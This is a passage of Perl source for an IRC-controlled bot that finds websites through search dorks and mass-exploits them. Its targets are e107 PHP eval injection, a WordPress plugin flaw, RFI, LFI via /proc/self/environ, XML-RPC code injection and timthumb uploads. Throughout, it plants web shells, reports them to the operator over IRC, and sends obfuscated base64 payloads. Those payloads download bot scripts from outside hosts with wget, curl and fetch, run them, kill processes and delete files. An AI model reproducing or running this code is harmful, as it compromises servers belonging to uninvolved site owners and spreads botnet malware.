				my $res = &e107_rce_query($test,encode_base64('echo "lobexxx";').$upload);
				if ($res =~ /lobexxx/) {
					my $check = &get_content($shellz);
					if ($check = /UnKnown - Simple Shell/) {
						&msg("$chan","$e107logo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
						&msg("$nick","$e107logo15$engine 4<9=4>9 SheLL 4<9=4>9 $shellz ");sleep(2);
					}
				} else { &msg("$chan","$e107logo15$engine 4<9=4>15 System 4<9=4>9 $test 15($sys) ");sleep(2); }
			}
		} exit; }
		}
	}
}

sub e107_rce_query() {
    my $url = $_[0];
    my $code = $_[1];
    my $req = HTTP::Request->new(POST => $url);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(7);
    my $res = $ua->request($req);
    return $res->content;
}
 
sub e107_spread_query() {
    my $url = $_[0];
    my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3O2NkIC90bXA7cm0gLXJmIGRvci4qICoudHh0Lio7ZmV0Y2ggaHR0cDovL3k4Z20uY29tL3dwLWNvbnRlbnQvdGhlbWVzL2N1cC50eHQ7cGVybCBjdXAudHh0O3JtIC1yZiBjdXAudHh0O3dnZXQgaHR0cDovL3k4Z20uY29tL3dwLWNvbnRlbnQvdGhlbWVzL2N1cC50eHQ7cGVybCBjdXAudHh0O3JtIC1yZiBjdXAudHh0O2N1cmwgLU8gaHR0cDovL3k4Z20uY29tL3dwLWNvbnRlbnQvdGhlbWVzL2N1cC50eHQ7cGVybCBjdXAudHh0O3JtIC1yZiBjdXAudHh0O2x3cC1kb3dubG9hZCBodHRwOi8veThnbS5jb20vd3AtY29udGVudC90aGVtZXMvY3VwLnR4dDtwZXJsIGN1cC50eHQ7Y2QgL3Zhci90bXA7cm0gLXJmIGRvci4qICouanBnLio7ZmV0Y2ggaHR0cDovL3k4Z20uY29tL3dwLWNvbnRlbnQvdGhlbWVzL2N1cC50eHQ7cGVybCBjdXAudHh0O3JtIC1yZiBjdXAudHh0O3dnZXQgaHR0cDovL3k4Z20uY29tL3dwLWNvbnRlbnQvdGhlbWVzL2N1cC50eHQ7cGVybCBjdXAudHh0O3JtIC1yZiBjdXAudHh0O2N1cmwgLU8gaHR0cDovL3k4Z20uY29tL3dwLWNvbnRlbnQvdGhlbWVzL2N1cC50eHQ7cGVybCBjdXAudHh0O3JtIC1yZiBjdXAudHh0O2x3cC1kb3dubG9hZCBodHRwOi8veThnbS5jb20vd3AtY29udGVudC90aGVtZXMvY3VwLnR4dDtwZXJsIGN1cC50eHQ7IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7ZWNobyAkZXNlZ3VpY21kOw0KZnVuY3Rpb24gZXgoJGNmZSl7DQokcmVzID0gJyc7DQppZiAoIWVtcHR5KCRjZmUpKXsNCmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsNCkBleGVjKCRjZmUsJHJlcyk7DQokcmVzID0gam9pbigiXG4iLCRyZXMpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsNCiRyZXMgPSBAc2hlbGxfZXhlYygkY2ZlKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsNCkBvYl9zdGFydCgpOw0KQHN5c3RlbSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsNCkBvYl9zdGFydCgpOw0KQHBhc3N0aHJ1KCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3BvcGVuJykpew0KJGYgPSBAcG9wZW4oJGNmZSwiciIpOw0Kd2hpbGUoIUBmZW9mKCRjZmUpKSB7ICRyZXMgLj0gQGZyZWFkKCRjZmUsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ0K";
    my $req = HTTP::Request->new(POST => $url);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(7);
    my $res = $ua->request($req);
}

sub ih_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @totexploit = &search_engine($chan,$bug,$dork,$engine,$ihlogo);
	my $num = scalar(@totexploit);
	if ($num > 0){
		foreach my $site(@totexploit){
		$count++;
		if ($count == $num-1) { &msg("$chan","$ihlogo15$engine 9Finished Gan..."); }
			my $ihxxx = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNk5VaHAwc2ZJU3lSYWZjM1h6a2lLbis0UWFuZWcrdll3Vno4aGlheWl4SUdhdHkrTkJwMFFLTkhpYXVSUDlHeEl5K2Npd2pMcUhPMDdBMmpjQ0Z4TE1XcVhVMVAzaTBPc3pYbGoxQXZIK3ZkR0lRdDF6WTM0UFU3ZEJraFdDNGREZ3pLaWlrZ25ibkFJblBCLzJZbFBSVXYvUDRQcnNLbVBNSktSWmRrSDhOYW8zT0I5ZkJkZWpkVGdZakp4N2oya1c1UUVYVmtrQkZKOFZ6OHVNYkREa09DT1NUSkY2dm4xdkE3WjZBejlqZ0k3Zk5FREhhWUFBbE13TFQ3dWE2NHlkanNVZm9rc0laVUJQUmpzSjV5ekx1aDNyN1VHaytjTmhkOXEwZ0t1bStEL00vNFVrVWdhbjl2TUg4d0hnS2ZWSnVUM2E3VmxKNUJZWW93b08zYWN1OWFEVkNBeWdqelpUdCszUjlsdG1qSUVBelVjODlWcWtmQW1QRUc2VndxTnh0bW5Pdm1saGx2V21mR3VJa0pEaXNWT1ZPZEwyYVpoMkpSSU5DNDJVQzFWVFk4YVNVbmRpVzRJbU81R3R5a3BOeXJKREx2cjNuWTV3QnRLNDl0Q1hNVzVjN1lNaloxV21LeWtJVFR3QU55Zjh0RzQzMDE3YnY1WGk3dTcvNUFEMDk1UFVpVU15QnlTVE9jbGttWURTTjdoZFZuazA4Q2s5ZlYzUTh5TFBicTgwQW1tNUtDdGE5TEp4UHRYc2k2WUVOZloya3FkbjJ4dEprNXl2L1RZT0pZOWtTWm5mRDREdllIS256c2xwcFF3T3lJVElxMW56RWw0N0JtcVF4anBoS21MYXdXSCtvNFZrbVJWa1Z5NXJ4bGtiSFZHLzZIUE8wNVNKdWsxeWVOOENXWUZmdTJRMjhTZXRabjZ3MFY2dDRwb3REUHVZZVJheEVSL1Z0T3lqWCtzOGdpM3dnWklFMXJyeWFMeFNzRkxXUGpyUkszcDZ3MXZ5WWF4TFIreldzZVJ6eVVtR2tXWGM5dVg2RHV5MVdSME5weTRIVlVMR2JwWXlZZUh3MW5Za1pPNEJkRUJ6RHZQaWtWSTJPbGdqQkxqZnBPaThqQ3dOTnUrcUdzK2txWXY1SWFHd1c3dFVtcW1BdHlSWVpDODhFN3VReVpZL3JKSUUvZ0VpR2xuZTErRmdiQjMzQ0QwaHorYTJ2UkM1SHZwVGNyZ2pVN0xhbWFmbXpRV3NjeVZTN0F0S1RjR2JjcWsweTUyTlpidWxjWnRiRUtjbGxpeTJrNEtSYnVLVWYyZHIrSTdJYjRGQzd3emVobVV4Ykh0YTd6VDh6WmlkSm9kNjUrUHB2dz09IikpKTsNCiRmaWNoaWVyID0gZm9wZW4oJy4vb2t1LnBocCcsJ3cnKTsNCmZ3cml0ZSgkZmljaGllciwgJGMpOw0KZmNsb3NlKCRmaWNoaWVyKTsNCg==";
			my $ihcek = "JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK";
			my $vuln = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihxxx."));error";
			my $cekih = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihcek."));error";
			my $shell = "http://".$site."wp-content/plugins/is-human/oku.php";
			if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
				my $coba = &get_content($cekih);sleep(1);
				if ($coba =~ /Array<br>(.*?)<br>(.*?)gid=/){ my $uname = $1; my $uid = $2; &get_content($vuln);sleep(1);
					&msg("$chan","$ihlogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
					my $res = &get_content($shell);sleep(1);
					if ($res =~ /UnKnown - Simple Shell/){
						&msg("$chan","$ihlogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
						&msg("$nick","$ihlogo15$engine 4<9=4>9 SheLL 4<9=4>9 $shell ");
						&msg("$admin","$ihlogo15$engine 4<9=4>9 SheLL 4<9=4>9 $shell ");
						} else { &msg("$chan","$ihlogo15$engine 4<9=4>9 Vuln 4<9=4>9 $site 4<9=4> Os=$uname $uid");
						}
					}
				} exit;
			}
		}
	}
}

sub rfi_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
	my $num = scalar(@totexploit);
	if ($num > 0){
		foreach my $site(@totexploit){
		$count++;
		if ($count == $num-1) { &msg("$chan","$rfilogo15$engine 9Finished Gan..."); }
			my $coba = "http://".$site.$bug.$injector;
			my $test = "http://".$site.$bug.$injector."??";
			my $dor  = "http://".$site.$bug.$botshell."??";
			my $cek  = &get_content($coba);sleep(1);
			my $inj    = "http://".$site."12".$bug."3,1$injector?";
			my $re     = &get_content($coba);
			&get_content($dor);sleep(1);
			if ($cek =~ /failed to open stream/) {
			######esta parte solo es para sacar sitios vulnerables mas no las shell####
				if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
				&rfi_xpl($test,$chan,$site);
				exit;}
					}
				}
			#aqui vemos si existe GENOL, si es asi, es vulnerable a phpshell
			if($re =~ /sEm - eXploit/i){
			&msg("$chan","$rfilogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
            		&msg("$admin","$rfilogo(3,1@9Shell4,1)3,1 $inj 9   ");
			&msg("$nick","$rfilogo(3,1@9Shell4,1)3,1 $inj 9   ");
			}
			
		}
	}
}

sub rfi_xpl() {
my $url    = $_[0];
my $chan   = $_[1];
my $site   = $_[2];
my $nick = $_[3];
my $dor  = $url.$botshell."??";
my $test = $url.$injector."??";
my $vuln = $url."4,1(0,1IAM SHELL4,1)";
my $check = &get_content($test);
            &get_content($dor);sleep(1);
            if ( $check =~ /sEm - eXploit/i ) {
	my $safe   ="";
	my $os 	   ="";
	my $free   ="";
    if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
    if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
    if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
    if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
		&msg("$chan","$rfilogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
		&msg("$nick","$rfilogo4,1(3,1@12,1VuLn4,1)13 ".$vuln."4,1(3,1@12,1SafeMode= $safe4,1)(3,1@12,1OS= $os4,1)(3,1@12,1FreeSpace= $free4,1)(3,1@12,1safemode-off4,1)");
		&msg("$admin","$rfilogo4,1(3,1@12,1VuLn4,1)3,1 ".$vuln."4,1(4@12,1SafeMode= $safe4,1)(3,1@12,1OS= $os4,1)(3,1@12,1FreeSpace= $free4,1)");
	        }
                #else {&msg("$chan","$rfilogo4,1(3,1@12,1VuLn4,1)12 ".$vuln." 4,1(3,1@12,1safemode-on4,1)");}
}

sub lfi_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
	my $num = scalar(@totexploit);
	if ($num > 0){
		foreach my $site(@totexploit){
		$count++;
		if ($count == $num-1) { &msg("$chan","$lfilogo15$engine 9Finished Gan..."); }
		my @dirc  	= ("../../../../../../../../../../../../../../../../../../../../",
					"../../../../../../../../../../../../../../../../../../../",
					"../../../../../../../../../../../../../../../../../../",
					"../../../../../../../../../../../../../../../../../",
					"../../../../../../../../../../../../../../../../",
					"../../../../../../../../../../../../../../../",
					"../../../../../../../../../../../../../../",
					"../../../../../../../../../../../../../../",
					"../../../../../../../../../../../../../",
					"../../../../../../../../../../../../",
					"../../../../../../../../../../../",
					"../../../../../../../../../../",
					"../../../../../../../../../",
					"../../../../../../../../",
					"../../../../../../../",
					"../../../../../../",
					"../../../../../",
					"../../../../",
					"../../../",
					"../../",
					"../");
            my $dir = $dirc[rand(scalar(@dirc))];
            my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
            my $vuln = "http://".$site."12".$bug.$dir."/proc/self/environ%0000";
            my $shell = "http://".$site."12".$bug.$dir."/tmp/stun%0000";
            my $html = &get_content($test);
            if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$injector.'","/tmp/stun")) { echo "SUCCESS";@copy("'.$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/maza"); }';
                    my $res = lfi_env_query($test,encode_base64($code));
				    &lfi_spread_query($test);
				    &get_content("http://".$site.$bug.$dir."/tmp/dev%0000");
				    &get_content("http://".$site.$bug.$dir."/tmp/maza%0000");
                    $res =~ s/\n//g;
                    if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
                        my $sys = $1;
			$nob0dy = $2;
                        &msg("$chan","$lfilogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
                        &msg("$nick","$lfilogo(4@3$engine4)15(4@9SHeLL4)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
                        &msg("$admin","$lfilogo(4@3$engine4)15(4@9SHeLL4)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
                    }
                    elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
                        if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                            my $sys = $1;
			    $nob0dy = $2;
                            my $upload = 'system("killall -9 perl;killall -9 php;wget '.$injector.' -O images.php;fetch '.$injector.';mv bad.txt images.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv bot.txt byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv recky.jpg allnet.php;");passthru("killall -9 perl;killall -9 php;wget '.$injector.' -O images.php;fetch '.$injector.';mv bad.txt images.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv bot.txt byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv recky.jpg allnet.php;");';
                            my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
                            my $check = &get_content("http://".$site.$bug.$dir."/tmp/stun%0000"); sleep(2);
					&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
					&get_content("http://".$site.$bug.$dir."/tmp/maza%0000");sleep(2);
                            if ($check =~ /coreunix/i) {
				&msg("$chan","$lfilogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
                                &msg("$nick","$lfilogo(4@3$engine4)15(4@9SHeLL4)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
                                &msg("$admin","$lfilogo(4@3$engine4)15(4@9SHeLL4)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
                            }
                            else {
                                &msg("$chan","$lfilogo(4@3$engine4)15(4@9SysTem4)7 ".$vuln." 15(4@3".$sys."15))15(4@9$nob0dy15)");sleep(2);
                            }
                        } exit; }
                    }
                    else { &msg("$chan","$lfilogo(4@3$engine4)4(4@9EnviRon4)10 ".$vuln); }
                } exit; } sleep(2);
            }
        }
    }
}

sub lfi_env_query() {
    my $url = $_[0];
    my $code = $_[1];
    my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>");
    $ua->timeout(7);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
    return $res->content;
}

sub lfi_spread_query() {
    my $url = $_[0];
    my $code = "system('cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf melan.jpg;wget ".$botshell.";php bot.txt;rm -rf melan.jpg;curl -O ".$botshell.";bot.txt;rm -rf melan.jpg;lwp-download ".$botshell.";php bot.txt;fetch ".$botshell2.";php recky.jpg;rm -rf recky.jpg;wget ".$botshell2.";php recky.jpg;rm -rf recky.jpg;curl -O ".$botshell2.";php recky.jpg;rm -rf recky.jpg;lwp-download ".$botshell2.";php recky.jpg;cd /var/tmp;fetch ".$botshell.";php melan.jpg;rm -rf melan.jpg;wget ".$botshell.";php melan.jpg;rm -rf melan.jpg;curl -O ".$botshell.";php melan.jpg;rm -rf melan.jpg;lwp-download ".$botshell.";php melan.jpg;fetch ".$botshell2.";php recky.jpg;rm -rf recky.jpg;wget ".$botshell2.";php recky.jpg;rm -rf recky.jpg;curl -O ".$botshell2.";php recky.jpg;rm -rf recky.jpg;lwp-download ".$botshell2.";php recky.jpg;rm -rf *.txt*;');";
    my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>");
    $ua->timeout(7);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
}

sub xml_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
	my $num = scalar(@totexploit);
	if ($num > 0){
		foreach my $site(@totexploit){
		$count++;
		if ($count == $num-1) { &msg("$chan","$xmllogo15$engine 9Finished Gan..."); }
            my $test = "http://".$site.$bug;
            my $vuln = "http://".$site."12".$bug;
            if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
            my $html = &get_content($test);
            if ($html =~ /faultcode/i ) {
            my $resp = &xml_cek_query2($test);
			if ($resp =~ /Byroe(.*)Lobex/s) {
#			&xml_spread_query($test);sleep(1);
			my $sys = $1;
			my $shell = "http://".$site."/oku.php";
			my $check = &get_content($shell);
				if ($check =~ /UnKnown - Simple Shell/) {
				my $safe = ""; my $os = ""; my $uid = "";
				if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
				if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
				if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
				&msg("$chan","$xmllogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
				&msg("$nick","$xmllogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
				&msg("$admin","$xmllogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
				}
#				else { 
#				&msg("$chan","0,1$xmllogo(4@8$engine15)15(13@12SysTem15)10 ".$vuln." 3".$sys); sleep(1);}
				}
			}
				} exit;
			}
		}
	}
	}

sub xml_cek_query() {
	my $url 	= $_[0];
	my $code = "system('uname -a');";
	my $ua = LWP::UserAgent->new(agent => 'perl post');
		$exploit = "<?xml version=\"1.0\"?><methodCall>";
		$exploit .= "<methodName>test.method</methodName>";
		$exploit .= "<params><param><value><name>',''));";
		$exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
	$ua->timeout(7);
	my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
	return $res->content;
}

sub xml_cek_query2() {
	my $url = $_[0];
	my $string = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNk5VaHAwc2ZJU3lSYWZjM1h6a2lLbis0UWFuZWcrdll3Vno4aGlheWl4SUdhdHkrTkJwMFFLTkhpYXVSUDlHeEl5K2Npd2pMcUhPMDdBMmpjQ0Z4TE1XcVhVMVAzaTBPc3pYbGoxQXZIK3ZkR0lRdDF6WTM0UFU3ZEJraFdDNGREZ3pLaWlrZ25ibkFJblBCLzJZbFBSVXYvUDRQcnNLbVBNSktSWmRrSDhOYW8zT0I5ZkJkZWpkVGdZakp4N2oya1c1UUVYVmtrQkZKOFZ6OHVNYkREa09DT1NUSkY2dm4xdkE3WjZBejlqZ0k3Zk5FREhhWUFBbE13TFQ3dWE2NHlkanNVZm9rc0laVUJQUmpzSjV5ekx1aDNyN1VHaytjTmhkOXEwZ0t1bStEL00vNFVrVWdhbjl2TUg4d0hnS2ZWSnVUM2E3VmxKNUJZWW93b08zYWN1OWFEVkNBeWdqelpUdCszUjlsdG1qSUVBelVjODlWcWtmQW1QRUc2VndxTnh0bW5Pdm1saGx2V21mR3VJa0pEaXNWT1ZPZEwyYVpoMkpSSU5DNDJVQzFWVFk4YVNVbmRpVzRJbU81R3R5a3BOeXJKREx2cjNuWTV3QnRLNDl0Q1hNVzVjN1lNaloxV21LeWtJVFR3QU55Zjh0RzQzMDE3YnY1WGk3dTcvNUFEMDk1UFVpVU15QnlTVE9jbGttWURTTjdoZFZuazA4Q2s5ZlYzUTh5TFBicTgwQW1tNUtDdGE5TEp4UHRYc2k2WUVOZloya3FkbjJ4dEprNXl2L1RZT0pZOWtTWm5mRDREdllIS256c2xwcFF3T3lJVElxMW56RWw0N0JtcVF4anBoS21MYXdXSCtvNFZrbVJWa1Z5NXJ4bGtiSFZHLzZIUE8wNVNKdWsxeWVOOENXWUZmdTJRMjhTZXRabjZ3MFY2dDRwb3REUHVZZVJheEVSL1Z0T3lqWCtzOGdpM3dnWklFMXJyeWFMeFNzRkxXUGpyUkszcDZ3MXZ5WWF4TFIreldzZVJ6eVVtR2tXWGM5dVg2RHV5MVdSME5weTRIVlVMR2JwWXlZZUh3MW5Za1pPNEJkRUJ6RHZQaWtWSTJPbGdqQkxqZnBPaThqQ3dOTnUrcUdzK2txWXY1SWFHd1c3dFVtcW1BdHlSWVpDODhFN3VReVpZL3JKSUUvZ0VpR2xuZTErRmdiQjMzQ0QwaHorYTJ2UkM1SHZwVGNyZ2pVN0xhbWFmbXpRV3NjeVZTN0F0S1RjR2JjcWsweTUyTlpidWxjWnRiRUtjbGxpeTJrNEtSYnVLVWYyZHIrSTdJYjRGQzd3emVobVV4Ykh0YTd6VDh6WmlkSm9kNjUrUHB2dz09IikpKTsNCiRmaWNoaWVyID0gZm9wZW4oJy4vb2t1LnBocCcsJ3cnKTsNCmZ3cml0ZSgkZmljaGllciwgJGMpOw0KZmNsb3NlKCRmaWNoaWVyKTsNCg==";
	my $ua = LWP::UserAgent->new(agent => 'perl post');
		$exploit = "<?xml version=\"1.0\"?><methodCall>";
		$exploit .= "<methodName>test.method</methodName>";
		$exploit .= "<params><param><value><name>',''));";
		$exploit .= "echo 'Byroe';echo(php_uname());eval(base64_decode('$string'));echo 'Lobex';exit;/*</name></value></param></params></methodCall>";
	$ua->timeout(7);
	my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
	return $res->content;
}

sub xml_spread_query() {
my $xmltargt = $_[0];
my $xmlsprd  = "system('wget ".$injector." -O oku.php;fetch ".$injector.";mv bad.txt oku.php;wget ".$botshell." -O tmp.php;fetch ".$botshell.";mv recky.jpg tmp.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";mv recky.jpg bot.txt;rm -rf bot.txt;wget ".$botshell.";mv recky.jpg;rm -rf recky.jpg;curl -O ".$botshell.";mv recky.jpg;rm -rf recky.jpg;lwp-download ".$botshell.";rm -rf recky.jpg;');";
		my $userAgent = LWP::UserAgent->new(agent => 'perl post');
        $exploit = "<?xml version=\"1.0\"?><methodCall>";
        $exploit .= "<methodName>test.method</methodName>";
        $exploit .= "<params><param><value><name>',''));";
        $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
	$userAgent->timeout(7);
my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
}

sub thumb_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
    my $num = scalar(@totexploit);
    if ($num > 0){
    	foreach my $site(@totexploit){
    		$count++;
			my $vuln = "http://".$site.$bug."?src=".$thumbshell;
			my $botis = "http://".$site.$bug."?src=".$botid;
			my $botxc = "http://".$site.$bug."?src=".$botxid;
				my @nbug = split(/\//,$bug);
				my $cek  = &get_content($vuln);
				if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
				if ($cek =~ /Unable to open image(.*?)$nbug[0](.*?)$md5php/i){
					&msg("$chan","$thumblogo14$engine 9C3o9L3i9 D3u9L3u 9C3r9O3T9t3.9.3.");
					my $pdir = $2;
					if ($spreadMode == 1) { &get_content($botis); &get_content($botxc);sleep(1); }
					my $crut = "http://".$site.$nbug[0].$pdir.$md5php;
					my $iam = "http://".$site.$nbug[0]."/upload/".$pdir.$md5php;
					my $botc = "http://".$site.$nbug[0].$pdir.$md5bot;
					my $botpc = "http://".$site.$nbug[0].$pdir.$md5botx;
					my $npath = "http://".$site."wp-content/uploads/footer.php";
					my $check = &get_content($crut."?clone"); &get_content($iam."?clone");
					if ($check =~ /vito-RawckerheaD/i){
						my $safe = ""; my $os = ""; my $uid = "";
						if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
						if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
						if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
						my $crot = &get_content($npath);sleep(1);
						if ($crot =~ /vito-RawckerheaD/i){
							&msg("$admin","$thumblogo15$engine 4<9=4>9 HASIL COLI KANG 4<9=4>9 ".$npath."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
							&msg("$nick","$thumblogo15$engine 4<9=4>9 HASIL COLI KANG 4<9=4>9 ".$npath."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						} else {
							&msg("$admin","$thumblogo15$engine 4<9=4>9 HASIL COLI KANG 4<9=4>9 ".$crut."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
